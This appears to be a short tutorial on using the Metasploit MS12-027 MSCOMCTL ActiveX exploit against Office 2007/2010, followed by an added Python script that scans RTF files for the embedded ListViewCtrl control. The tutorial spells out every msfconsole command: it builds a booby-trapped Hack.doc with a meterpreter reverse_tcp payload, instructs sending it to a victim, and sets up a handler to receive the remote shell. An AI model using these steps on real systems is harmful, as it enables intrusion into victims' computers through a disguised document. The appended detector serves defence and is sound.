MS12-027 MSCOMCTL ActiveX Buffer Overflow
This module exploits a stack buffer overflow in MSCOMCTL.OCX. It uses a malicious RTF to embed the specially crafted MSComctlLib.ListViewCtrl.2 Control, as exploited in the wild in April 2012. This module targets Office 2007 and Office 2010. The DEP/ASLR bypass on Office 2010 is done with the Ikazuchi ROP chain proposed by Abysssec. This chain uses "msgr3en.dll", which is only loaded after Office has started, so the malicious file must be opened through "File / Open" to achieve exploitation.
Exploit Targets
- 0 - Microsoft Office 2007 [no-SP/SP1/SP2/SP3] English on Windows [XP SP3 / 7 SP1] English (default)
- 1 - Microsoft Office 2010 SP1 English on Windows [XP SP3 / 7 SP1] English
Requirement
Attacker: BackTrack
Victim PC: Windows XP
Step 1: open your terminal and type msfconsole
Step 2: now type use exploit/windows/fileformat/ms12_027_mscomctrl_bof
Step 3: set the required parameters
set payload windows/meterpreter/reverse_tcp
show options
set FILENAME Hack.doc (any file name you want)
set lhost 192.168.56.102
exploit
Now the .doc file that has to be sent to the victim is created at /root/.msf4/local/hack.doc.
We have to send this file to the victim.
Step 4: to receive the reverse connection, set up the multi handler.
We need a multi/handler session so that we can receive the reverse connection; to do that we run
use exploit/multi/handler
and
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.56.102
exploit
As soon as the victim opens the file, the Meterpreter session is established and the job is done.
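A defender-side check for the kind of file this walkthrough produces (an RTF that embeds the MSComctlLib.ListViewCtrl.2 control, handed out under a .doc name), as an added example that is not part of the original post or of the Metasploit module. The regex-based RTF parsing, the mismatch rule (RTF content under a .doc extension) and the two sample documents are constructed assumptions; real samples may obfuscate the \objclass keyword and deserve a full RTF parser.

```python
import re

# ProgID named in the write-up; extend with other MSCOMCTL ProgIDs you consider risky.
RISKY_OBJCLASSES = {"MSComctlLib.ListViewCtrl.2"}

OBJCLASS_RE = re.compile(r"\\objclass\s+([\w.]+)")
OBJDATA_RE = re.compile(r"\\objdata\s*([0-9a-fA-F\s]*?)\}")


def looks_like_rtf(data: bytes) -> bool:
    """RTF starts with '{\\rtf'; a .doc carrying this header is really RTF."""
    return data.lstrip().startswith(b"{\\rtf")


def scan_rtf(data: bytes) -> list:
    """List every embedded object: its ProgID, the \\objdata size and a risk flag."""
    text = data.decode("latin-1")          # RTF is 7-bit, so latin-1 never fails
    findings = []
    for m in OBJCLASS_RE.finditer(text):
        cls = m.group(1)
        blob = OBJDATA_RE.search(text, m.end())      # hex blob that follows the class
        size = len(re.sub(r"\s", "", blob.group(1))) // 2 if blob else 0
        findings.append({"objclass": cls, "objdata_bytes": size,
                         "risky": cls in RISKY_OBJCLASSES})
    return findings


def is_suspicious(filename: str, data: bytes) -> bool:
    """Flag RTF content hiding under a .doc name, or any risky ActiveX ProgID."""
    rtf = looks_like_rtf(data)
    if rtf and filename.lower().endswith(".doc"):
        return True
    return rtf and any(f["risky"] for f in scan_rtf(data))


# Constructed samples (assumption), not real captures.
BENIGN_RTF = b"{\\rtf1\\ansi Quarterly figures attached.}"
OCX_RTF = (b"{\\rtf1\\ansi{\\object\\objocx{\\*\\objclass MSComctlLib.ListViewCtrl.2}"
           b"{\\*\\objdata 0105000002000000 1a000000}}}")

if __name__ == "__main__":
    for name, blob in [("report.rtf", BENIGN_RTF), ("Hack.doc", OCX_RTF)]:
        print(name, is_suspicious(name, blob), scan_rtf(blob))
```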